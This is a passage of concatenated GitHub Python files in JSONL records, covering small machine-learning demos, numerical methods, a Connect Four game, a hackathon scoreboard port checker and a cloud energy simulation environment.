os.path import join\nimport numpy as np\nfrom scipy.sparse import coo_matrix as cmat\nfrom sklearn.naive_bayes import MultinomialNB as MNB, BernoulliNB as BNB\nfrom sklearn.metrics import accuracy_score\n\npath = 'ex6_prep/'\nX_trn_fn = join(path, 'train-features.txt')\ny_trn_fn = join(path, 'train-labels.txt')\nX_tst_fn = join(path, 'test-features.txt')\ny_tst_fn = join(path, 'test-labels.txt')\n\nnwords = 2500\n\ndef read_data(X_fn, y_fn):\n X = np.loadtxt(X_fn)\n y = np.loadtxt(y_fn)\n row = X[:,0] - 1\n col = X[:,1] - 1\n dat = X[:,2]\n\n X = cmat((dat, (row, col)), shape=(len(y), nwords))\n return X, y\n\nX_trn, y_trn = read_data(X_trn_fn, y_trn_fn)\nX_tst, y_tst = read_data(X_tst_fn, y_tst_fn)\nprint('train size: 
', y_trn.shape)\nprint('test size: ', y_tst.shape)\n\nmodel = MNB()\nmodel.fit(X_trn, y_trn)\n\ny_prd = model.predict(X_tst)\nscore = accuracy_score(y_tst, y_prd)\nprint('score: ', score)\n","repo_name":"hnmspirit/mlcb","sub_path":"a32_nbc/mnb_spam.py","file_name":"mnb_spam.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"23520895094","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\ndef calculate_distance(pointA,pointB):\n sum=0\n for i in range(0,len(pointA)):\n sum+=(pointA[i]-pointB[i]) **2\n return math.sqrt(sum)\n\ndef set_new_cluster(clusters):\n index_new_cluster=-10\n other_index=-10\n minm=1000000\n for i in range(0,len(clusters)):\n for ii in range(0,len(clusters)):\n for j in range(0,len(clusters[i])):\n for jj in range(0,len(clusters[ii])):\n if calculate_distance(clusters[ii][jj],clusters[i][j]) < minm and i != ii and minm!=0:\n if clusters[ii][jj]==clusters[i][j]:\n pass\n else:\n minm=calculate_distance(clusters[ii][jj],clusters[i][j])\n index_new_cluster=ii\n other_index=i\n new_cluster=[]\n for i in range(0,len(clusters)):\n if i == min(other_index,index_new_cluster):\n other_list=[]\n for elem in clusters[index_new_cluster]:\n other_list.append(elem)\n for elem in clusters[other_index]:\n other_list.append(elem)\n new_cluster.append(other_list)\n # clusters.remove(clusters[other_index])\n # clusters.remove(clusters[index_new_cluster])\n else:\n if i == other_index or i == index_new_cluster:\n pass\n else:\n new_cluster.append(clusters[i])\n return new_cluster\n \npoints=[]\nfor i in range(0,10):\n x=random.randint(0,100)\n y=random.randint(0,100)\n points.append([x,y])\n \nclusters=[] \nfor elem in points:\n clusters.append([elem])\n\n\nnewc=clusters\nprint(newc)\n\nfor i in range(0, len(clusters) -1):\n newc=set_new_cluster(newc)\n x=[]\n y=[]\n xx=[]\n yy=[]\n for elem in newc:\n #plt.plot(elem,'o',color='black')\n print(elem)\n x.append(elem[0][0])\n y.append(elem[0][1])\n if len(elem) >1:\n for e in elem:\n xx.append(e[0])\n yy.append(e[1])\n plt.plot(x,y,'o',color='black')\n plt.plot(xx,yy,'o',color='red')\n plt.show()\n print(newc)","repo_name":"DanilaIonutRomica/Hierarchical_Clustering","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30004930281","text":"\n\n\nimport numpy as np \nfrom matplotlib import pyplot as plt\n\n\n\n\n\n\n# The function we wanna calculate there racins \"Solutions\"\ndef f(x):\n\n return x**3-(11/6)*(x**2)+x-1/6 \n\n# Dichotonomie Methode of calculation :\n\n# The interval \na = int(input(\"Give us the first number of the interval: \"))\nb = int(input(\"Give us the second nimber of the interval: \"))\n\n#eps = real(input(\"Give us the epsilon number :\")) # nombre of iteration \neps = 10**-2\nn = 1 #Init at 1 \n# Dichotomy Algorithm :\ndef dichotomy(a,b,eps):\n while abs(f(b)-f(a)) > eps:\n root = None #intialise the root \"solution \" to None \n mid = (a+b)/2\n print(f'abs((a-b)/2)>eps was True, x is {x}!') ####\n # check \n if f(mid) == 0 or abs(f(mid)) < eps: \n root = mid # This to find out if the mid is close to the solution \n \n if f(a)*f(mid) <= 0:\n a = mid # make the a mid to do another mid also until it came up with the solution \n\n else:\n b = mid #make the b mid to do another mid also until it came up with the solution\n\n n = n + 1\n if 
root is None:\n print('Root not found') # solution not found \n else:\n print(f'The root, according to the dichotomy method, is at the point x = {root}') # print the solution\n\n#dichotomy(a,b,eps)\n\n \n# graph of the function :\n# use matplotlib\n\npltr = input(\"Do you wanna plot the fonction graph?:[y/n]:\")\n\nx = np.linspace(a,0.0001,b) # the interval of the plot [a,b] and the x\n\ny = x**3-(11/6)*(x**2)+x-1/6 # the function we wanna plot f(x) = y\n\nif pltr == \"y\" :\n plt.plot(x, y, c = \"black\",) # use any color you want the standard is blue \n plt.title(input(\"Give us the Function Title: \"))\n plt.xlabel(\"axe x\") # name the axes as x and y ...\n plt.ylabel(\"axe y\") \n plt.show() # if True the graph will show up \nelif pltr == \"n\":\n print(\"OK,Thank you\")\n\n\n# if there is an error :\nelse:\n print(\"Error, You didn't choose [y/n] Try again.\")\n\n","repo_name":"adelkandi/MN_Dicho","sub_path":"Dicho.py","file_name":"Dicho.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"7934437829","text":"import json\nfrom unittest import mock\n\nfrom bankaccount.usecases import response_objects as resp\nfrom bankaccount.entities.transfer import Transfer\nfrom bankaccount.entities.account import Account\n\n\ntest_trs = Transfer(\n trs_id=1,\n trs_timestamp=\"2019-01-22 09:00:00\",\n trs_from=Account.from_dict({'code':\"1234567890F\", 'balance':1000}),\n trs_to=Account.from_dict({'code':\"3333333333A\", 'balance':1000}),\n trs_amount=321.00\n )\n\nmimetype = 'application/json'\nheaders = {\n 'Content-Type': mimetype,\n 'Accept': mimetype\n }\ndata = {\n 'from': '1234567890F',\n 'to': '3333333333A',\n 'amount': 321.00\n }\n\n@mock.patch('bankaccount.usecases.transfer_usecases.TransferAmountUseCase')\ndef test_post_transfer(mock_usecase, client):\n mock_usecase().execute.return_value = resp.ResponseSuccess(test_trs)\n http_response = client.post('/transfer', data=json.dumps(data), headers=headers)\n\n assert http_response.status_code == 200\n assert http_response.mimetype == 'application/json'\n\n\n@mock.patch('bankaccount.usecases.transfer_usecases.TransferAmountUseCase')\ndef test_post_transfer_failure(mock_usecase, client):\n mock_usecase().execute.return_value = resp.ResponseFailure.build_system_error('test error message')\n http_response = client.post('/transfer', data=json.dumps(data), headers=headers)\n\n assert json.loads(http_response.data.decode('UTF-8')) == {'type': resp.ResponseFailure.SYSTEM_ERROR, \n 'message': 'test error message'}\n assert http_response.status_code == 500\n assert http_response.mimetype == 'application/json'\n","repo_name":"youarhache/BankAccountKata","sub_path":"tests/adapters/test_post_transfer.py","file_name":"test_post_transfer.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25757129665","text":"from tkinter import ttk\r\nimport tkinter as tk\r\n\r\nclass InputFrame(tk.Frame) :\r\n def __init__(self, parent, root, *args, **kwargs) :\r\n super().__init__(parent, *args, **kwargs)\r\n\r\n self.root = root\r\n\r\n self.columnconfigure(0, weight=1)\r\n self.rowconfigure(0, weight=1)\r\n \r\n self.isFirst = True\r\n\r\n self.style = ttk.Style()\r\n\r\n self.inputArea = tk.Text(self, height=10, width=25, wrap=\"word\", font=(\"Cambiria\", 12, \"bold\"), foreground=\"black\", background=\"gray86\", selectbackground=\"black\", 
selectforeground=\"yellow\")\r\n self.inputArea.grid(row=0, column=0, sticky=\"nsew\")\r\n self.inputArea.focus_force()\r\n\r\n areaScrollBarY = ttk.Scrollbar(self, orient=\"vertical\", command=self.inputArea.yview)\r\n areaScrollBarY.grid(row=0, column=1, sticky=\"nsew\")\r\n\r\n self.inputArea.config(yscrollcommand=areaScrollBarY.set)\r\n\r\n self.inputArea.insert(tk.END, \"Enter the assembly code here\")\r\n self.inputArea.bind(\"\", self.clearTextContent)\r\n\r\n self.inputArea.bind(\"\", self.clearTextContent)\r\n \r\n def clearTextContent(self, *event) :\r\n self.inputArea.delete(\"1.0\", tk.END)\r\n self.inputArea.unbind(\"\")\r\n\r\n def saveAndCloseTextContent(self) :\r\n self.inputArea.config(state=\"disabled\")\r\n\r\n with open(\"data.txt\", 'w') as f:\r\n f.write(self.inputArea.get(\"1.0\", tk.END).rstrip())\r\n\r\n","repo_name":"yildizahmett/machine-simulation","sub_path":"gui_frames/inputFrame.py","file_name":"inputFrame.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35537299854","text":"from contextlib import closing\nimport socket\nimport random\nimport threading\n\n\nclass Scoreboard(object):\n\n ip_list = []\n ports = {\"FTP\": 21,\n \"SSH\": 22,\n \"SMTP\": 25,\n \"HTTP\": 80,\n \"Remote Desktop\": 445}\n update_interval = -1\n\n\n def __init__(self, update_interval):\n\n self.get_ips(\"./ips.txt\")\n self.update_interval = update_interval\n\n\n def get_ips(self, filepath):\n\n with open(filepath, \"r\") as f:\n\n self.ip_list = f.readlines()\n\n for i in range(0, len(self.ip_list)):\n\n self.ip_list[i] = self.ip_list[i].strip()\n\n\n def port_is_open(self, ip, port):\n\n with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:\n\n s.settimeout(3)\n\n if s.connect_ex((ip, port)) == 0:\n\n return True\n\n return False\n\n\n def check_ports(self):\n\n port_check = {}\n\n for ip in self.ip_list:\n\n port_check[ip] = {}\n\n for port in self.ports:\n\n port_check[ip][port] = self.port_is_open(ip, self.ports[port])\n\n\n return port_check\n\n\n def update(self, *args, **kwargs):\n\n offset = args[0]\n\n def update_wrapper(func):\n\n def run_func():\n\n delay = self.update_interval + random.randint(-1 * offset, offset)\n threading.Timer(delay, run_func).start()\n\n func()\n\n run_func()\n\n return func\n\n return update_wrapper\n","repo_name":"MatthewCS/suhackathon","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12618427230","text":"import theano\nimport theano.tensor as T\n\nimport matching_model\nimport ranking_model\nfrom utils import relu, tanh\n\n\ndef set_model(argv, emb, vocab):\n x = T.imatrix('x')\n y = T.ivector('y')\n l = T.iscalar('l')\n\n \"\"\" Set the classifier parameters\"\"\"\n window = argv.window\n opt = argv.opt\n lr = argv.lr\n init_emb = emb\n dim_emb = argv.dim_emb if emb is None else len(emb[0])\n dim_hidden = argv.dim_hidden\n n_vocab = vocab.size()\n L2_reg = argv.reg\n unit = argv.unit\n n_layers = argv.layer\n sim = argv.sim\n activation = relu if argv.activation == 'relu' else tanh\n\n if argv.task == 'binary':\n model = matching_model.Model(x=x, y=y, l=l, window=window, opt=opt, lr=lr,\n init_emb=init_emb, dim_emb=dim_emb, dim_hidden=dim_hidden,\n n_vocab=n_vocab, L2_reg=L2_reg, unit=unit, sim=sim,\n n_layers=n_layers, activation=activation)\n else:\n model = 
ranking_model.Model(x=x, y=y, l=l, window=window, opt=opt, lr=lr,\n init_emb=init_emb, dim_emb=dim_emb, dim_hidden=dim_hidden,\n n_vocab=n_vocab, L2_reg=L2_reg, unit=unit, sim=sim,\n n_layers=n_layers, activation=activation)\n return model\n\n\ndef set_train_f(model, dataset):\n # dataset = [x, y, l]\n # x=features: 1D: n_samples * n_words, 2D: window; elem=word id\n # y=labels: 1D: n_samples; elem=scalar\n # l=question length: 1D: n_samples * 2; elem=scalar\n # bb_x=batch indices for x: 1D: n_samples / batch_size + 1; elem=(bob, eob)\n # bb_y=batch indices for y: 1D: n_samples / batch_size + 1; elem=(bob, eob)\n\n index = T.iscalar('index')\n bob_x = T.iscalar('bob_x')\n eob_x = T.iscalar('eob_x')\n bob_y = T.iscalar('bob_y')\n eob_y = T.iscalar('eob_y')\n\n train_f = theano.function(inputs=[index, bob_x, eob_x, bob_y, eob_y],\n outputs=[model.correct, model.nll],\n updates=model.update,\n givens={\n model.tr_inputs[0]: dataset[0][bob_x: eob_x],\n model.tr_inputs[1]: dataset[1][bob_y: eob_y],\n model.tr_inputs[2]: dataset[2][index],\n }\n )\n return train_f\n\n\ndef set_predict_f(model, dataset):\n # dataset = [x, y, l]\n # x=features: 1D: n_samples * n_words, 2D: window; elem=word id\n # y=labels: 1D: n_samples; elem=scalar\n # l=question length: 1D: n_samples * 2; elem=scalar\n # bb_x=batch indices for x: 1D: n_samples / batch_size + 1; elem=(bob, eob)\n # bb_y=batch indices for y: 1D: n_samples / batch_size + 1; elem=(bob, eob)\n\n index = T.iscalar('index')\n bob_x = T.iscalar('bob_x')\n eob_x = T.iscalar('eob_x')\n bob_y = T.iscalar('bob_y')\n eob_y = T.iscalar('eob_y')\n\n predict_f = theano.function(inputs=[index, bob_x, eob_x, bob_y, eob_y],\n outputs=model.correct,\n givens={\n model.pr_inputs[0]: dataset[0][bob_x: eob_x],\n model.pr_inputs[1]: dataset[1][bob_y: eob_y],\n model.pr_inputs[2]: dataset[2][index],\n }\n )\n return predict_f\n","repo_name":"hiroki13/question-answering-system","sub_path":"retrieval-qa-system/model_builder.py","file_name":"model_builder.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"73877073006","text":"from array import *\n\n# KAMUS\n# X, i = int\n# found = bool\n# search = array[0:N]\n\n# ALGORITMA\n\nX = int(input(\"Masukan nilai X: \"))\n\n# definisi array\nsearch = array('i', [1,2,3,5,6])\n\n# definisi awal nilai\nfound = False\ni = 0\n\nwhile (found != True and i < len(search)):\n\tif(X < search[i]):\n\t\t# print(str(search[i]) + \" terdapat pada indeks ke-\" + str(i))\n\t\tfound = True\n\telse:\n\t\ti = i + 1\n\t\n# cetak hasil\t\nif (found == False):\n\tprint(\" Tidak ada yang lebih besar dari \" + str(X))\nelse:\n\tprint(str(search[i]) + \" terdapat pada indeks ke-\" + str(i))","repo_name":"daimessdn/py-incubator","sub_path":"exercise list (py)/gabut/SearchingArray2.py","file_name":"SearchingArray2.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4245947400","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom keras.datasets import mnist\ndataset = mnist.load_data('mymnist.db')\ntrain , test = dataset\nX_test , y_test = test\nX_train , y_train = train\nX_train_1d = X_train.reshape(-1 , 28*28)\nX_test_1d = X_test.reshape(-1 , 28*28)\nX_train_1d.shape\nX_train = X_train_1d.astype('float32')\nX_test = X_test_1d.astype('float32')\nfrom keras.utils.np_utils import to_categorical\ny_train_cat = 
to_categorical(y_train)\ny_test_cat=to_categorical(y_test)\ny_train_cat\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nmodel = Sequential()\nmodel.add(Dense(units=1000, input_dim=28*28, activation='relu'))\nmodel.summary()\nmodel.add(Dense(units=515, activation='relu'))\nmodel.add(Dense(units=250, activation='relu'))\nmodel.add(Dense(units=100, activation='relu'))\nmodel.summary()\nmodel.add(Dense(units=10, activation='softmax'))\nfrom keras.optimizers import RMSprop\nmodel.compile(optimizer=RMSprop(), loss='categorical_crossentropy', \n metrics=['accuracy']\n )\nh = model.fit(X_train, y_train_cat,epochs=3)\nprint(h.history['accuracy'][-1])\nwith open(\"/mlops2/accuracy.text\",\"+w\") as f3:\n f3.write(h.history['accuracy'][-1])\n\n\n\n\n","repo_name":"Hritickgoyal524/Task3MnistDataset","sub_path":"Mytask3final.py","file_name":"Mytask3final.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18723091621","text":"from graphics import *\n\n\nclass Board:\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n W = self.width\n H = self.height\n self.data = [ [' '] * W for row in range(H) ] \n \n \n def __repr__(self):\n H = self.height\n W = self.width\n s = ''\n for row in range(0, H):\n s += '|' \n for col in range(0, W):\n s += self.data[row][col] + '|'\n s += '\\n'\n\n s += (2 * W + 1) * '-'\n \n s += '\\n'\n \n for col in range(0,W):\n if col >= 10:\n col = col % 10\n s += ' ' + str(col)\n \n return s\n \n \n def addMove(self, col, ox):\n row = self.height - 1\n \n while row >= 0:\n if self.data[row][col] == ' ':\n \n if ox is 'O':\n self.graphical_data[row][col].setFill(\"blue\")\n self.graphical_data[row][col].setOutline(\"blue\")\n else:\n self.graphical_data[row][col].setFill(\"red\")\n self.graphical_data[row][col].setOutline(\"red\")\n \n self.data[row][col] = ox\n break\n else:\n row -= 1\n \n \n def clear(self):\n W = self.width\n H = self.height\n self.data = [ [' '] * W for row in range(H) ]\n \n \n def setBoard(self, moveString):\n nextCh = 'X'\n for colString in moveString:\n col = int(colString)\n if 0 <= col <= self.width - 1:\n self.addMove(col, nextCh)\n if nextCh == 'X': nextCh = 'O'\n else: nextCh = 'X'\n \n \n def allowsMove(self, c):\n H = self.height\n W = self.width\n D = self.data\n \n if c < 0 or c > W - 1:\n return False\n \n for row in range(0, H):\n if D[row][c] == ' ':\n return True\n \n return False\n \n \n def isFull(self):\n W = self.width\n isAllows = False\n \n for col in range(0, W):\n isAllows = self.allowsMove(col)\n if isAllows == True:\n return False\n \n return True\n \n \n def delMove(self, c):\n H = self.height\n row = 0\n \n while row < H:\n if self.data[row][c] != ' ':\n self.data[row][c] = ' '\n break\n else:\n row += 1\n \n \n def winsFor(self, ox):\n H = self.height\n W = self.width\n D = self.data\n \n #horizontal check\n for row in range(0, H):\n for col in range(0, W - 3):\n if D[row][col] == ox and \\\n D[row][col + 1] == ox and \\\n D[row][col + 2] == ox and \\\n D[row][col + 3] == ox:\n return True\n \n #vertical check \n for row in range(0, H - 3):\n for col in range(0, W):\n if D[row][col] == ox and \\\n D[row + 1][col] == ox and \\\n D[row + 2][col] == ox and \\\n D[row + 3][col] == ox:\n return True \n \n #diagonal leftDown to rightUp check \n for row in range(0, H - 3):\n for col in range(3, W):\n if D[row][col] == ox and \\\n D[row + 1][col - 1] == ox and \\\n D[row + 2][col - 
2] == ox and \\\n D[row + 3][col - 3] == ox:\n return True\n \n #diagonal leftUp to rightDown check \n for row in range(0, H - 3):\n for col in range(0, W - 3):\n if D[row][col] == ox and \\\n D[row + 1][col + 1] == ox and \\\n D[row + 2][col + 2] == ox and \\\n D[row + 3][col + 3] == ox:\n return True\n \n return False\n \n\n def hostGame(self):\n print(\"Welcome to Connect Four!\\n\")\n print(self)\n \n self.initGraphicBoard(self.width, self.height) \n \n isWins = False\n checker = 'X'\n \n while self.isFull() == False: \n print(\"\\n\" + checker + \"'s choice: \"), \n users_col = self.getSelectedCol(self.win.getMouse().getX())\n print(str(users_col) + \"\\n\")\n #users_col = input(\"\\n\" + checker + \"'s choice: \")\n \n if self.allowsMove(users_col) == False:\n #print(\"Out of range. Points must be re-entered.\\n\")\n continue\n \n self.addMove(users_col, checker) \n \n isWins = self.winsFor(checker)\n if isWins == True:\n self.win.close()\n print(\"\\n\" + checker + \" wins -- Congratulations!\\n\")\n print(self)\n return\n \n print(self)\n \n checker = self.changeChecker(checker)\n \n self.win.close()\n print(\"\\nDraw Game!\\n\")\n print(self)\n \n \n def initGraphicBoard(self, W, H):\n self.diameter = 60\n self.radius = self.diameter / 2\n diameter = self.diameter\n radius = self.radius\n self.win = GraphWin( \"Connect Four\", (diameter * W) + diameter, (diameter * H) + diameter )\n self.win.setBackground(color_rgb(255,161,51))\n self.graphical_data = []\n for row in range(H):\n new_row = []\n for col in range(W):\n center = Point(diameter + (diameter * col), diameter + (diameter * row))\n circle = Circle(center, radius - 2)\n circle.setFill(color_rgb(204,204,204))\n circle.setOutline(color_rgb(204,204,204))\n circle.draw(self.win)\n new_row += [circle]\n self.graphical_data += [new_row]\n \n \n def getSelectedCol(self, pointX):\n diameter = self.diameter\n radius = self.radius\n width = self.width\n \n if pointX < radius:\n return -1\n \n if pointX > radius + (diameter * width):\n return width\n \n for devidedColumn in range(0, width):\n colCenterX = diameter + (diameter * devidedColumn)\n if colCenterX - radius <= pointX and pointX <= colCenterX + radius:\n return devidedColumn\n\n\n def changeChecker(self, nextChecker):\n if nextChecker == 'X':\n return 'O'\n else:\n return 'X'\n\n","repo_name":"gmanpark/connectfour","sub_path":"ConnectFour/Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11243100084","text":"import typer\n\nimport pfp_cli.enum as enum\nimport pfp_cli.scan as scan\n\napp = typer.Typer()\napp.add_typer(enum.app, name=\"enum\")\napp.add_typer(scan.app, name=\"scan\")\n\n\n__version__ = \"0.1.0\"\n\n\ndef version_callback(value: bool):\n if value:\n typer.echo(f\"PFP-CLI Version: {__version__}\")\n raise typer.Exit()\n\n\n@app.callback()\ndef main(version: bool = typer.Option(None, \"-v\", \"--version\", \ncallback=version_callback, is_eager=True, help=\"Show current version of pfp-cli\")):\n return\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"H3r1CH/pfp-cli","sub_path":"pfp_cli/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"11478079653","text":"import sys\r\n\r\nfrom env_energy import *\r\nfrom env_traffic import *\r\nfrom performanceCalculator import *\r\n\r\n\r\nclass 
CloudEnvironment:\r\n time_machine = None\r\n battery = [None for x in range(N_OF_CLOUD)]\r\n CREATE_INPUT_DATA = False\r\n\r\n def __init__(self, city, traffic_rate):\r\n # ----- DEBUG\r\n # self.debug_reward_per_urf = [0 for x in range(4)]\r\n # self.debug_count_per_urf = [0 for x in range(4)]\r\n # ----- DEBUG\r\n self.time_machine = TimeMachine.get_instance()\r\n self.du_load_in_cc = 0\r\n self.number_of_ue = NUMBER_OF_UE_PER_EC * N_OF_EC # Total Number of User\r\n self.r_ec = range(N_OF_EC)\r\n self.traffic_load = None # we will get these given data from folder input/given_data\r\n self.solar_energy = None\r\n self.cost_avg = [0 for x in range(N_OF_CLOUD)]\r\n self.ren_en_avg = [0 for x in range(N_OF_CLOUD)]\r\n self.unstored_en_avg = [0 for x in range(N_OF_CLOUD)]\r\n if self.CREATE_INPUT_DATA:\r\n city_list = ['stockholm', 'cairo', 'jakarta']\r\n for c in city_list:\r\n self.create_and_save_solar_energy(c)\r\n # Traffic.create_and_save_traffic(1)\r\n sys.exit()\r\n\r\n self.load_data(traffic_rate, city)\r\n\r\n self.current_trafic_load = np.array([0 for x in range(N_OF_EC)])\r\n self.current_remaining_energy = np.array([0 for x in range(N_OF_CLOUD)])\r\n self.current_time = np.array(0)\r\n ACTION_NUMBER_OF_URF_LIST = [0, 1, 2, 3]\r\n self.number_of_active_urf = np.array(\r\n [[0 for x in range(len(ACTION_NUMBER_OF_URF_LIST))] for x in range(N_OF_EC)])\r\n self.renewable_energy_ratio = np.array([[0 for x in range(2)] for x in range(N_OF_CLOUD)])\r\n self.state_space_size = self.current_trafic_load.size + self.current_remaining_energy.size + self.current_time.size\r\n self.action_space_size = self.number_of_active_urf.size * self.renewable_energy_ratio.size\r\n\r\n def get_renewable_energy_ratio(self, action):\r\n return self.renewable_energy_ratio[action % self.renewable_energy_ratio.size]\r\n\r\n def get_number_of_active_urf(self, action):\r\n return self.number_of_active_urf[int(np.floor(action / self.renewable_energy_ratio.size))]\r\n\r\n def disaggr_action(self, action):\r\n self.number_of_active_urf = self.get_number_of_active_urf(action)\r\n self.renewable_energy_ratio = self.get_renewable_energy_ratio(action)\r\n return self.renewable_energy_ratio, self.number_of_active_urf\r\n\r\n def close(self):\r\n Event('print performance results', 'test')\r\n pass\r\n\r\n def create_and_save_solar_energy(self, city_name):\r\n snapshot = Snapshot()\r\n snapshot.set_solar_data_path(city_name)\r\n solar_energy = SolarEnergy(city_name) # connecting the battery to the solar panel\r\n snapshot.save_solar_energy(solar_energy)\r\n print(\"solar energy is saved in a file.\")\r\n\r\n\r\n # Loading Traffic and Solar Energy\r\n def load_data(self, traffic_rate, city):\r\n # LOAD TRAFFIC\r\n snapshot = Snapshot()\r\n snapshot.set_traffic_data_path(1) # always 1, we change the traffic rate after loading the generated one\r\n self.traffic_load = snapshot.load_tr()\r\n self.traffic_load = self.traffic_load * traffic_rate\r\n # Traffic.plt_traffic_in_a_year_period(self.traffic_load[0][0])\r\n snapshot.set_solar_data_path(city)\r\n self.solar_energy = snapshot.load_solar_energy()\r\n if AVERAGE_GIVEN_DATA:\r\n self.traffic_load = Traffic.get_average_traffic(self.traffic_load)\r\n\r\n def step_dqn(self, number_of_active_urf, renewable_energy_ratio):\r\n # s_{t} calculate the load\r\n current_time_slot = self.time_machine.get_hour()\r\n the_day = self.time_machine.get_day_of_the_year()\r\n du_urllc_load = [0 for x in range(N_OF_EC)]\r\n du_embb_load = [0 for x in range(N_OF_EC)]\r\n du_load = [0 for x in 
range(N_OF_EC)]\r\n remaining_en = [0 for x in range(N_OF_CLOUD)]\r\n du_load_in_cc = 0\r\n for ec_index in range(N_OF_EC):\r\n du_urllc_load[ec_index] = self.traffic_load[ec_index][PacketType.URLLC][the_day][\r\n current_time_slot] * N_OF_URF\r\n du_embb_load[ec_index] = self.traffic_load[ec_index][PacketType.EMBB][the_day][\r\n current_time_slot] * number_of_active_urf[ec_index]\r\n du_load[ec_index] = du_urllc_load + du_embb_load\r\n du_load_in_cc += self.traffic_load[ec_index][PacketType.EMBB][the_day][current_time_slot] * (\r\n N_OF_URF - number_of_active_urf[ec_index])\r\n # s_{t} update the energy consumption\r\n remaining_en[ec_index] = self.battery[ec_index].battery_update(du_load, renewable_energy_ratio[ec_index])\r\n # s_{t} update the energy consumption\r\n remaining_en[CC_INDEX] = self.battery[ec_index].battery_update(du_load_in_cc, renewable_energy_ratio[CC_INDEX])\r\n\r\n # s_{t+1}\r\n next_time_slot = (current_time_slot + 1) % NUMBER_OF_TIME_SLOT_IN_ONE_DAY\r\n # s_{t+1} get the energy consumption according to battery updates\r\n cost = 0\r\n for i in range(N_OF_CLOUD):\r\n cost += self.battery[0].get_the_fossil_en_cons()\r\n reward = -cost\r\n # s_{t+1} get the traffic loads\r\n for ec_index in range(N_OF_EC):\r\n du_load[ec_index] = self.traffic_load[ec_index][PacketType.EMBB][next_time_slot]\r\n\r\n return remaining_en, du_load, next_time_slot, reward\r\n\r\n def step(self, number_of_active_urf, renewable_energy_ratio, ec_index):\r\n current_time_slot = self.time_machine.get_hour()\r\n the_day = self.time_machine.get_day_of_the_year()\r\n if ec_index == CC_INDEX:\r\n # print(\"cc_load:{}\".format(self.du_load_in_cc))\r\n remaining_en = self.battery[ec_index].battery_update(self.du_load_in_cc, renewable_energy_ratio)\r\n self.du_load_in_cc_diagnose = self.du_load_in_cc\r\n self.du_load_in_cc = 0\r\n else: # EC\r\n if AVERAGE_GIVEN_DATA:\r\n du_urllc_load = self.traffic_load[ec_index][PacketType.URLLC][current_time_slot] * N_OF_URF\r\n du_urllc_load = 0 # fixme: remove this line\r\n du_embb_load = self.traffic_load[ec_index][PacketType.EMBB][current_time_slot] * number_of_active_urf\r\n self.du_load_in_cc += self.traffic_load[ec_index][PacketType.EMBB][current_time_slot] * (\r\n N_OF_URF - number_of_active_urf)\r\n else:\r\n du_urllc_load = self.traffic_load[ec_index][PacketType.URLLC][the_day][current_time_slot] * N_OF_URF\r\n du_embb_load = self.traffic_load[ec_index][PacketType.EMBB][the_day][\r\n current_time_slot] * number_of_active_urf\r\n self.du_load_in_cc += self.traffic_load[ec_index][PacketType.EMBB][the_day][current_time_slot] * (\r\n N_OF_URF - number_of_active_urf)\r\n du_load = du_urllc_load + du_embb_load\r\n # print(\"ec_load:{}\".format(du_load))\r\n remaining_en = self.battery[ec_index].battery_update(du_load, renewable_energy_ratio)\r\n\r\n # print(\"ec_index:{} number_of_active_urf:{}\".format(ec_index, number_of_active_urf))\r\n self.cost_avg[ec_index], self.unstored_en_avg[ec_index] = self.battery[\r\n ec_index].get_the_last_24_hour_consumptions()\r\n total_cost = 0\r\n ren_en_avg = 0\r\n for i in range(N_OF_CLOUD):\r\n # print(\"i:{} cost:{}\".format(i, self.cost_avg[i]))\r\n if i == CC_INDEX:\r\n total_cost += self.cost_avg[i]\r\n ren_en_avg += self.ren_en_avg[i]\r\n # reward = -(cost_avg / 1000.0) + (ren_en_avg / 200.0)\r\n # if self.unstored_en_avg[ec_index] > 0:\r\n # print(\"debuggging\")\r\n # reward = (total_cost / REWARD_NORMALIZER)\r\n UNSTORED_EN_WEIGHTING_FACTOR = 5\r\n # reward = (total_cost + self.unstored_en_avg[ec_index] * 
